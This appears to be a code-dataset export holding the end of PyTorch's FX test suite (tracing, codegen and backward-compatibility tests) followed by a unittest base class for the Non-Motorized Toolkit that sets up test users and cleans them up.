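# into the flat placeholder values and process_outputs rebuilds the structured result;
# bare_fx was recompiled with the plain CodeGen above and takes the flat arguments directly.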
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
nf = symbolic_trace(nf)
self.assertEqual(nf(val), orig_out)
assert "tree_flatten_spec" not in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == 1)
nf = symbolic_trace(nf, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
pickled = pickle.dumps(nf)
nf = pickle.loads(pickled)
self.assertEqual(nf(val), orig_out)
for f, inp in tests:
verify_pytree(f, inp)
def test_pytree_concrete(self):
def f(b, a):
if b:
return a['a']
else:
return a['z']
inp = {'a': {'a': PH, 'z': PH}, 'b': True}
nf = symbolic_trace(f, concrete_args=inp)
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
self.assertEqual(nf(**val), f(**val))
nf = symbolic_trace(nf)
self.assertEqual(nf(**val), f(**val))
def test_custom_codegen(self):
class ListCodeGen(CodeGen):
def gen_fn_def(self, free_vars, maybe_return_annotation):
lst_unpack = f"""
def forward(self, args_list: List[torch.Tensor]){maybe_return_annotation}:
{', '.join(free_vars)} = args_list"""
return lst_unpack
def additional_globals(self):
return [('List', typing.List)]
def process_inputs(self, *inputs):
assert(len(inputs) == 1)
return inputs[0]
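# ListCodeGen above makes the generated forward take a single list argument: gen_fn_def
# unpacks args_list into the original placeholder names, additional_globals exposes List to
# the generated code, and process_inputs maps that single list back to the flat placeholder
# values used by graph.process_inputs.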
def f(a, b):
return a + b
nf = symbolic_trace(f)
vals = [torch.randn(3), torch.randn(3)]
self.assertEqual(nf(*vals), f(*vals))
nf.graph.set_codegen(ListCodeGen())
nf.recompile()
bare_fx = GraphModule({}, copy.deepcopy(nf.graph))
bare_fx.graph.set_codegen(CodeGen())
bare_fx.recompile()
self.assertEqual(nf(vals), f(*vals))
self.assertEqual(nf.graph.process_outputs(bare_fx(*nf.graph.process_inputs(vals))), f(*vals))
ts_f = torch.jit.script(nf)
self.assertEqual(nf(vals), ts_f(vals))
def test_imul_code_print(self):
graph = torch.fx.Graph()
a = graph.placeholder("a")
b = graph.placeholder("b")
graph.call_function(operator.imul, (a, b), {})
graph.output(a)
gm = torch.fx.GraphModule({}, graph)
gm.recompile()
self.assertEqual(gm(2, 3), 6)
self.assertIn("a *= b", gm.code)
def run_getitem_target():
from torch.fx._symbolic_trace import _wrapped_methods_to_patch
_wrapped_methods_to_patch.append((torch.Tensor, "__getitem__"))
try:
TestFX().getitem_inner()
finally:
_wrapped_methods_to_patch.pop()
class TestOperatorSignatures(JitTestCase):
def setUp(self):
# Checking for mutable operations while tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
@onlyCPU
@ops(op_db, allowed_dtypes=(torch.float,))
def test_get_torch_func_signature_exhaustive(self, device, dtype, op):
if not isinstance(op.op, types.BuiltinFunctionType):
raise unittest.SkipTest("This path doesn't work on Python functions")
sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False)
schemas = get_signature_for_torch_op(op.op)
if not schemas:
raise RuntimeError('No Schemas Returned')
for sample_input in sample_inputs_itr:
# Iterate through overloads until we hit a match. If we exit this
# loop via `else`, we haven't found a match
for schema in schemas:
try:
bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs)
bound_args.apply_defaults()
op(*bound_args.args, **bound_args.kwargs)
break
except TypeError as e:
pass
else:
raise RuntimeError(f'Did not match any schemas for op {op.name}!')
class TestFXAPIBackwardCompatibility(JitTestCase):
def setUp(self):
self.maxDiff = None
# Checking for mutable operations while tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def _fn_to_stable_annotation_str(self, obj):
"""
Unfortunately we have to serialize function signatures manually since
serialization for `inspect.Signature` objects is not stable across
python versions
"""
fn_name = torch.typename(obj)
signature = inspect.signature(obj)
sig_str = f'{fn_name}{signature}'
arg_strs = []
for k, v in signature.parameters.items():
maybe_type_annotation = f': {self._annotation_type_to_stable_str(v.annotation, sig_str)}'\
if v.annotation is not inspect.Signature.empty else ''
def default_val_str(val):
if isinstance(val, (tuple, list)):
str_pieces = ['(' if isinstance(val, tuple) else '[']
str_pieces.append(', '.join(default_val_str(v) for v in val))
if isinstance(val, tuple) and len(str_pieces) == 2:
str_pieces.append(',')
str_pieces.append(')' if isinstance(val, tuple) else ']')
return ''.join(str_pieces)
# Need to fix up some default value strings.
# First case: modules. Default module `repr` contains the FS path of the module.
# Don't leak that
if isinstance(val, types.ModuleType):
return f'<module {val.__name__}>'
# Second case: callables. Callables (such as lambdas) encode their address in
# their string repr. Don't do that
if callable(val):
return f'<function {val.__name__}>'
return str(val)
if v.default is not inspect.Signature.empty:
default_val_str = default_val_str(v.default) if not isinstance(v.default, str) else f"'{v.default}'"
maybe_default = f' = {default_val_str}'
else:
maybe_default = ''
maybe_stars = ''
if v.kind == inspect.Parameter.VAR_POSITIONAL:
maybe_stars = '*'
elif v.kind == inspect.Parameter.VAR_KEYWORD:
maybe_stars = '**'
arg_strs.append(f'{maybe_stars}{k}{maybe_type_annotation}{maybe_default}')
return_annot = f' -> {self._annotation_type_to_stable_str(signature.return_annotation, sig_str)}'\
if signature.return_annotation is not inspect.Signature.empty else ''
return f'{fn_name}({", ".join(arg_strs)}){return_annot}'
def _annotation_type_to_stable_str(self, t, sig_str):
if t is inspect.Signature.empty:
return ''
# Forward ref
if isinstance(t, str):
return f"'{t}'"
if hasattr(typing, 'ForwardRef') and isinstance(t, typing.ForwardRef):
return t.__forward_arg__
if hasattr(typing, '_ForwardRef') and isinstance(t, typing._ForwardRef):
return t.__forward_arg__
trivial_mappings = {
str : 'str',
int : 'int',
float: 'float',
bool: 'bool',
torch.dtype: 'torch.dtype',
torch.Tensor: 'torch.Tensor',
torch.device: 'torch.device',
torch.memory_format: 'torch.memory_format',
slice: 'slice',
torch.nn.Module: 'torch.nn.modules.module.Module',
torch.fx.Graph : 'torch.fx.graph.Graph',
torch.fx.Node : 'torch.fx.node.Node',
torch.fx.Proxy : 'torch.fx.proxy.Proxy',
torch.fx.node.Target : 'torch.fx.node.Target',
torch.fx.node.Argument : 'torch.fx.node.Argument',
torch.fx.graph.PythonCode : 'torch.fx.graph.PythonCode',
torch.fx.graph_module.GraphModule: 'torch.fx.graph_module.GraphModule',
torch.fx.subgraph_rewriter.Match: 'torch.fx.subgraph_rewriter.Match',
Ellipsis : '...',
typing.Any: 'Any',
type(None): 'NoneType',
None: 'None',
typing.Iterator: 'Iterator',
}
mapping = trivial_mappings.get(t, None)
if mapping:
return mapping
# Handle types with contained types
contained = getattr(t, '__args__', None) or []
# Callables contain a bare List for arguments
contained = t if isinstance(t, list) else contained
# Python 3.8 puts type vars into __args__ for unbound types such as Dict
if all(isinstance(ct, typing.TypeVar) for ct in contained):
contained = []
contained_type_annots = [self._annotation_type_to_stable_str(ct, sig_str) for ct in contained]
contained_type_str = f'[{", ".join(contained_type_annots)}]' if len(contained_type_annots) > 0 else ''
origin = getattr(t, '__origin__', None)
if origin is None:
# Unbound types don't have `__origin__` in some Python versions, so fix that up here.
origin = t if t in {typing.Tuple, typing.Union, typing.Dict, typing.List, typing.Type, typing.Callable} else origin
if origin in {tuple, typing.Tuple}:
return f'Tuple{contained_type_str}'
if origin in {typing.Union}:
# Annoying hack to detect Optional
if len(contained) == 2 and (contained[0] is type(None)) ^ (contained[1] is type(None)):
not_none_param = contained[0] if contained[0] is not type(None) else contained[1]
return f'Optional[{self._annotation_type_to_stable_str(not_none_param, sig_str)}]'
return f'Union{contained_type_str}'
if origin in {dict, typing.Dict}:
return f'Dict{contained_type_str}'
if origin in {list, typing.List}:
return f'List{contained_type_str}'
if origin in {type, typing.Type}:
return f'Type{contained_type_str}'
if isinstance(t, typing.Callable):
if len(contained) > 0 and contained[0] is not Ellipsis:
return f'Callable[[{", ".join(contained_type_annots[:-1])}], {contained_type_annots[-1]}]'
else:
return f'Callable{contained_type_str}'
raise RuntimeError(f'Unrecognized type {t} used in BC-compatible type signature {sig_str}.'
f'Please add support for this type and confirm with the '
f'FX team that your signature change is valid.')
def test_function_back_compat(self):
"""
Test backward compatibility for function signatures with
@compatibility(is_backward_compatible=True). Currently this checks for
exact signature matches, which may lead to false positives. If this
becomes too annoying, we can refine this check to actually parse out
the saved schema strings and check if the change is truly backward-
incompatible.
"""
signature_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if not isinstance(obj, type):
signature_strs.append(self._fn_to_stable_annotation_str(obj))
signature_strs.sort()
try:
self.assertExpected('\n'.join(signature_strs), 'fx_backcompat_function_signatures')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX function that has been marked " \
f"as backwards-compatible has experienced a signature change. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_class_member_back_compat(self):
"""
Test backward compatibility for members of classes with
@compatibility(is_backward_compatible=True). Currently this checks for
exact matches on the publicly visible members of the class.
"""
class_method_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if isinstance(obj, type):
public_members = [name for name in obj.__dict__ if not name.startswith('_')]
class_method_strs.append(f'{torch.typename(obj)} {sorted(public_members)}')
class_method_strs.sort()
try:
self.assertExpected('\n'.join(class_method_strs), 'fx_backcompat_class_members')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX class that has been marked " \
f"as backwards-compatible has experienced change in its public members. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_public_api_surface(self):
non_back_compat_objects = {}
def check_symbols_have_bc_designation(m, prefix):
if not m.__name__.startswith('torch.fx'):
return
if m.__name__.startswith('torch.fx.experimental'):
return
for k, v in m.__dict__.items():
if v is m:
continue
if k.startswith('_'):
continue
if isinstance(v, types.ModuleType):
check_symbols_have_bc_designation(v, prefix + [k])
elif isinstance(v, type) or isinstance(v, types.FunctionType):
if v not in _MARKED_WITH_COMATIBLITY:
non_back_compat_objects.setdefault(v)
check_symbols_have_bc_designation(torch.fx, ['torch', 'fx'])
check_symbols_have_bc_designation(torch.fx.passes, ['torch', 'fx', 'passes'])
non_back_compat_strs = [torch.typename(obj) for obj in non_back_compat_objects.keys()]
# Only want objects in torch.fx
non_back_compat_strs = [
s for s in non_back_compat_strs if s.startswith('torch.fx') and not s.startswith('torch.fx.experimental')]
# Only want objects in public namespaces
non_back_compat_strs = [
s for s in non_back_compat_strs if all(not atom.startswith('_') for atom in s.split('.'))]
non_back_compat_strs.sort()
if len(non_back_compat_strs) != 0:
raise AssertionError(f"Public FX API(s) {non_back_compat_strs} introduced but not given a "
f"backwards-compatibility classification! Please decorate these "
f"API(s) with `@torch.fx._compatibility.compatibility` to specify "
f"BC guarantees.")
class TestFunctionalTracing(JitTestCase):
def setUp(self):
# Checking for mutable operations while tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary",
"has_torch_function_variadic", "handle_torch_function",
"boolean_dispatch")
TO_PATCH = {"has_torch_function": None,
"has_torch_function_unary": None,
"has_torch_function_variadic": None}
BUILT_IN_FUNC = (AssertionError, "")
PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable")
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default")
ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$")
CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow")
INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined")
MUTABLE = (RuntimeError, r"Tried to trace mutable operation")
UNTRACEABLE_FUNCTIONALS = {
"adaptive_avg_pool1d": BUILT_IN_FUNC,
"avg_pool1d": BUILT_IN_FUNC,
"avg_pool2d": BUILT_IN_FUNC,
"avg_pool3d": BUILT_IN_FUNC,
"bilinear": BUILT_IN_FUNC,
"celu_": BUILT_IN_FUNC,
"channel_shuffle": BUILT_IN_FUNC,
"native_channel_shuffle": BUILT_IN_FUNC,
"conv1d": BUILT_IN_FUNC,
"conv2d": BUILT_IN_FUNC,
"conv3d": BUILT_IN_FUNC,
"conv_tbc": BUILT_IN_FUNC,
"conv_transpose1d": BUILT_IN_FUNC,
"conv_transpose2d": BUILT_IN_FUNC,
"conv_transpose3d": BUILT_IN_FUNC,
"cosine_similarity": BUILT_IN_FUNC,
"elu_": BUILT_IN_FUNC,
"gelu": BUILT_IN_FUNC,
"hardshrink": BUILT_IN_FUNC,
"hardtanh_": BUILT_IN_FUNC,
"leaky_relu_": BUILT_IN_FUNC,
"linear": BUILT_IN_FUNC,
"logsigmoid": BUILT_IN_FUNC,
"one_hot": BUILT_IN_FUNC,
"pairwise_distance": BUILT_IN_FUNC,
"pdist": BUILT_IN_FUNC,
"pixel_shuffle": BUILT_IN_FUNC,
"pixel_unshuffle": BUILT_IN_FUNC,
"prelu": BUILT_IN_FUNC,
"relu_": BUILT_IN_FUNC,
"rrelu_": BUILT_IN_FUNC,
"selu_": BUILT_IN_FUNC,
"softplus": BUILT_IN_FUNC,
"softshrink": BUILT_IN_FUNC,
"threshold_": BUILT_IN_FUNC,
"adaptive_avg_pool2d": LEN_ERROR,
"adaptive_avg_pool3d": LEN_ERROR,
"adaptive_max_pool2d_with_indices": LEN_ERROR,
"adaptive_max_pool3d_with_indices": LEN_ERROR,
"instance_norm": CONTROL_FLOW,
"pad": LEN_ERROR,
"adaptive_max_pool1d": PROXY_ITERABLE,
"adaptive_max_pool2d": PROXY_ITERABLE,
"adaptive_max_pool3d": PROXY_ITERABLE,
"fractional_max_pool2d": PROXY_ITERABLE,
"fractional_max_pool3d": PROXY_ITERABLE,
"max_pool1d": PROXY_ITERABLE,
"max_pool2d": PROXY_ITERABLE,
"max_pool3d": PROXY_ITERABLE,
"group_norm": PROXY_ITERATED,
"lp_pool2d": PROXY_ITERATED,
"max_unpool1d": PROXY_ITERATED,
"max_unpool2d": PROXY_ITERATED,
"max_unpool3d": PROXY_ITERATED,
"adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"layer_norm": ARG_TYPE_MISMATCH,
"lp_pool1d": ARG_TYPE_MISMATCH,
"affine_grid": CONTROL_FLOW,
"alpha_dropout": CONTROL_FLOW,
"batch_norm": CONTROL_FLOW,
"binary_cross_entropy": CONTROL_FLOW,
"binary_cross_entropy_with_logits": CONTROL_FLOW,
"celu": CONTROL_FLOW,
"cosine_embedding_loss": CONTROL_FLOW,
"cross_entropy": CONTROL_FLOW,
"ctc_loss": CONTROL_FLOW,
"dropout": CONTROL_FLOW,
"dropout2d": CONTROL_FLOW,
"dropout3d": CONTROL_FLOW,
"elu": CONTROL_FLOW,
"embedding": CONTROL_FLOW,
"embedding_bag": CONTROL_FLOW,
"feature_alpha_dropout": CONTROL_FLOW,
"fold": CONTROL_FLOW,
"gaussian_nll_loss": CONTROL_FLOW,
"glu": CONTROL_FLOW,
"grid_sample": CONTROL_FLOW,
"gumbel_softmax": CONTROL_FLOW,
"hardsigmoid": CONTROL_FLOW,
"hardswish": CONTROL_FLOW,
"hardtanh": CONTROL_FLOW,
"hinge_embedding_loss": CONTROL_FLOW,
"huber_loss": CONTROL_FLOW,
"interpolate": CONTROL_FLOW,
"kl_div": CONTROL_FLOW,
"l1_loss": CONTROL_FLOW,
"leaky_relu": CONTROL_FLOW,
"local_response_norm": CONTROL_FLOW,
"margin_ranking_loss": CONTROL_FLOW,
"max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"mse_loss": CONTROL_FLOW,
"multi_head_attention_forward": CONTROL_FLOW,
"multi_margin_loss": CONTROL_FLOW,
"multilabel_margin_loss": CONTROL_FLOW,
"multilabel_soft_margin_loss": CONTROL_FLOW,
"nll_loss": CONTROL_FLOW,
"poisson_nll_loss": CONTROL_FLOW,
"relu": CONTROL_FLOW,
"relu6": CONTROL_FLOW,
"rrelu": CONTROL_FLOW,
"selu": CONTROL_FLOW,
"silu": CONTROL_FLOW,
"mish": CONTROL_FLOW,
"smooth_l1_loss": CONTROL_FLOW,
"soft_margin_loss": CONTROL_FLOW,
"threshold": CONTROL_FLOW,
"triplet_margin_loss": CONTROL_FLOW,
"triplet_margin_with_distance_loss": CONTROL_FLOW,
"unfold": CONTROL_FLOW,
"upsample": CONTROL_FLOW,
"upsample_bilinear": INTERPOLATE_ARGS_CONFLICT,
"upsample_nearest": INTERPOLATE_ARGS_CONFLICT,
"normalize" : MUTABLE,
}
# List of nn.functionals with Tensor inputs but not with type annotation
FUNCTIONALS_WITHOUT_ANNOTATION = (
"adaptive_max_pool1d",
"adaptive_max_pool2d",
"adaptive_max_pool3d",
"fractional_max_pool2d",
"fractional_max_pool3d",
"max_pool1d",
"max_pool2d",
"max_pool3d",
"gaussian_nll_loss",
"upsample",
"upsample_bilinear",
"upsample_nearest",
)
# Inconsistent behavior between Python 3.8 and other Python versions:
# - Python 3.8+: Re-raise internal exception like `PROXY_ITERATED`
# - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same
# internal exception above
# Use the following map to override the expected exception for Python 3.8
UNTRACEABLE_FUNCTIONALS_PY38 = {
"adaptive_max_pool1d": PROXY_ITERATED,
"adaptive_max_pool2d": PROXY_ITERATED,
"adaptive_max_pool3d": PROXY_ITERATED,
"fractional_max_pool2d": PROXY_ITERATED,
"fractional_max_pool3d": PROXY_ITERATED,
"max_pool1d": PROXY_ITERATED,
"max_pool2d": PROXY_ITERATED,
"max_pool3d": PROXY_ITERATED,
"group_norm": LEN_ERROR
}
@classmethod
def _get_functional(cls):
functional_list = []
for f in dir(torch.nn.functional):
if not f.islower():
continue
# Ignore internal functions
if f.startswith('_'):
continue
# Ignore supporting functions
if f in cls.IGNORE_FUNCS:
continue
fn = getattr(torch.nn.functional, f)
# Ignore non-callable object like modules
if not isinstance(fn, Callable):
continue
if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION:
try:
sig = inspect.signature(fn)
has_tensor_arg = False
for arg, param in sig.parameters.items():
if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor):
has_tensor_arg = True
if not has_tensor_arg:
continue
# inspect.signature() raises ValueError when the object has no retrievable signature
except ValueError:
pass
functional_list.append((f, fn))
return functional_list
@classmethod
def generate_test_func(cls, func_name, fn):
def functional_test(self):
if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \
sys.version_info >= (3, 8) and sys.version_info < (3, 10):
exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
elif func_name in self.UNTRACEABLE_FUNCTIONALS:
exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
else:
symbolic_trace(fn)
return functional_test
@classmethod
def generate_tests(cls):
functional_list = cls._get_functional()
for func_name, fn in functional_list:
test_name = "test_nn_functional_" + func_name
functional_test = cls.generate_test_func(func_name, fn)
setattr(cls, test_name, functional_test)
@classmethod
def setUpClass(cls):
def no(*args, **kwargs):
return False
for name in cls.TO_PATCH.keys():
cls.TO_PATCH[name] = getattr(torch.nn.functional, name)
setattr(torch.nn.functional, name, no)
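# The has_torch_function* helpers are stubbed out to always return False while these
# generated tests run; the originals are saved in TO_PATCH and restored in tearDownClass.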
@classmethod
def tearDownClass(cls):
for name in cls.TO_PATCH.keys():
setattr(torch.nn.functional, name, cls.TO_PATCH[name])
TestFunctionalTracing.generate_tests()
instantiate_device_type_tests(TestOperatorSignatures, globals())
@skipIfNoTorchVision
class TestVisionTracing(JitTestCase):
def setUp(self):
# Checking for mutable operations while tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
INCONSISTENT_TYPE = (
RuntimeError,
r"Return value was annotated as having type __torch__.torchvision.models[.\w]+ but is actually of type Tensor"
)
UNTRACEABLE_MODELS = {
"fasterrcnn_resnet50_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_320_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_fpn": PROXY_ITERATED,
"maskrcnn_resnet50_fpn": PROXY_ITERATED,
"keypointrcnn_resnet50_fpn": PROXY_ITERATED,
"retinanet_resnet50_fpn": PROXY_ITERATED,
}
UNSCRIPTABLE_MODELS = {
"googlenet": INCONSISTENT_TYPE,
"inception_v3": INCONSISTENT_TYPE,
}
output_transform = {
"fcn_resnet50": lambda x: x["out"],
"fcn_resnet101": lambda x: x["out"],
"deeplabv3_resnet50": lambda x: x["out"],
"deeplabv3_resnet101": lambda x: x["out"],
"deeplabv3_mobilenet_v3_large": lambda x: x["out"],
"lraspp_mobilenet_v3_large": lambda x: x["out"],
"fasterrcnn_resnet50_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_320_fpn": lambda x: x[1],
"maskrcnn_resnet50_fpn": lambda x: x[1],
"keypointrcnn_resnet50_fpn": lambda x: x[1],
"retinanet_resnet50_fpn": lambda x: x[1],
}
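# These torchvision models return dicts or tuples rather than a bare Tensor; output_transform
# picks out the comparable piece of each model's output so eager, traced and scripted results
# can be compared with assertEqual.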
@classmethod
def generate_test_fn(cls, name, model_fn, x, kwargs):
def run_test(self):
model = model_fn(**kwargs)
model = model.eval()
if name in self.UNTRACEABLE_MODELS:
err, exc = self.UNTRACEABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
graph = symbolic_trace(model)
else:
out_transform = self.output_transform.get(name, lambda x: x)
graph : torch.fx.GraphModule = symbolic_trace(model)
a = out_transform(model(x))
b = out_transform(graph(x))
self.assertEqual(a, b)
if name in self.UNSCRIPTABLE_MODELS:
err, exc = self.UNSCRIPTABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
script = torch.jit.script(graph)
else:
script = torch.jit.script(graph)
c = out_transform(script(x))
self.assertEqual(a, c)
return run_test
@classmethod
def generate_classification_tests(cls):
for k, v in torchvision_models.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_' + k
x = torch.rand(1, 3, 299, 299) if k in ['inception_v3'] else torch.rand(1, 3, 224, 224)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_segmentation_tests(cls):
for k, v in torchvision_models.segmentation.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_segmentation_' + k
x = torch.rand(1, 3, 32, 32)
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_detection_tests(cls):
for k, v in torchvision_models.detection.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_detection_' + k
x = [torch.rand(3, 300, 300)]
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_video_tests(cls):
for k, v in torchvision_models.video.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_video_' + k
x = torch.rand(1, 3, 4, 112, 112)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_tests(cls):
cls.generate_classification_tests()
cls.generate_detection_tests()
cls.generate_segmentation_tests()
cls.generate_video_tests()
if HAS_TORCHVISION:
TestVisionTracing.generate_tests()
if __name__ == '__main__':
run_tests()
| [] | [] | ["FX_PATCH_GETITEM"] | [] | ["FX_PATCH_GETITEM"] | python | 1 | 0 | |
tests/utils/NMTKTestCase.py
|
#!/usr/bin/env python
# Non-Motorized Toolkit
# Copyright (c) 2014 Open Technology Group Inc. (A North Carolina Corporation)
# Developed under Federal Highway Administration (FHWA) Contracts:
# DTFH61-12-P-00147 and DTFH61-14-P-00108
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the distribution.
# * Neither the name of the Open Technology Group, the name of the
# Federal Highway Administration (FHWA), nor the names of any
# other contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
# Open Technology Group Inc BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
# USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
# AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
# OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
# DAMAGE.
import unittest
import os
import simplejson as json
from tests.utils.client import NMTKClient
import logging
import subprocess
import string
import random
logger = logging.getLogger(__name__)
# Get some basic data..
base_path = os.path.abspath(os.path.join(os.path.dirname(__file__),
'../..'))
nmtk_path = os.environ.setdefault('NMTK_PATH', base_path)
class NMTKTestCase(unittest.TestCase):
def _id_generator(self, size=6,
chars=(string.ascii_lowercase +
string.ascii_uppercase +
string.digits)):
return ''.join(random.choice(chars) for x in range(size))
def getUsernamePassword(self):
return (self._id_generator(), self._id_generator())
def _getSiteConfigDynamic(self):
try:
command = ['python',
self.settings_command,
'create_config']
proc = subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = proc.communicate()
config = json.loads(err)
self.delusers.append(config['username'])
# Stderr contains the config output.
return config
except Exception as e:
logger.exception('Failed to get dynamic config!')
return None
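# The username created by create_config is appended to self.delusers above, so tearDown's
# purge_users call cleans it up after the test run.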
def _getSiteConfigStatic(self):
config_file = os.path.join(nmtk_path, 'tests/config.json')
if os.path.exists(config_file):
try:
config = json.loads(open(config_file).read())
return config
except Exception:
# Fall back (return None below) if the static config file is unreadable or malformed.
pass
return None
def _getSiteConfig(self):
config = self._getSiteConfigDynamic() or self._getSiteConfigStatic()
if config:
return config
raise Exception('No valid config found (tried both dynamic and static)')
def setUp(self):
self.settings_command = os.path.join(nmtk_path,
'NMTK_apps/manage.py')
self.delusers = []
config = self._getSiteConfig()
self.support_files = os.path.join(nmtk_path, 'tests/support_files')
self.site_url = config['site_url']
self.username = config['username']
self.password = config['password']
self.client = NMTKClient(self.site_url)
self.client.login(self.username, self.password)
self.api_user_url = self.client.getURL('api', 'user/')
self.api_file_url = self.client.getURL('api', 'datafile/')
def get_support_file(self, fn):
return os.path.join(self.support_files, fn)
def tearDown(self):
'''
Use the management purge_users command to purge the users created
during testing from the database.
'''
if self.delusers:
command = ['python',
self.settings_command,
'purge_users'] + self.delusers
with open(os.devnull, "w") as fnull:
subprocess.call(command, stdout=fnull, stderr=fnull)
def _create_user(self, *args, **kwargs):
'''
A helper method to create a new user, given a password and userid
'''
if len(args) == 2:
kwargs['username'] = args[0]
kwargs['password'] = args[1]
for key in ('username', 'password'):
kwargs.setdefault(key, self._id_generator())
response = self.client.create_user(**kwargs)
self.delusers.append(kwargs['username'])
return response
def _delete_user(self, url):
response = self.client.delete(url)
logger.debug('Deleted %s with status code of %s',
url, response.status_code)
return response
if __name__ == '__main__':
site_url = raw_input('Enter the URL: ').strip()
username = raw_input('Enter the username: ').strip()
password = raw_input('Enter the password: ').strip()
data = {'site_url': site_url,
'username': username,
'password': password}
data2 = json.dumps(data)
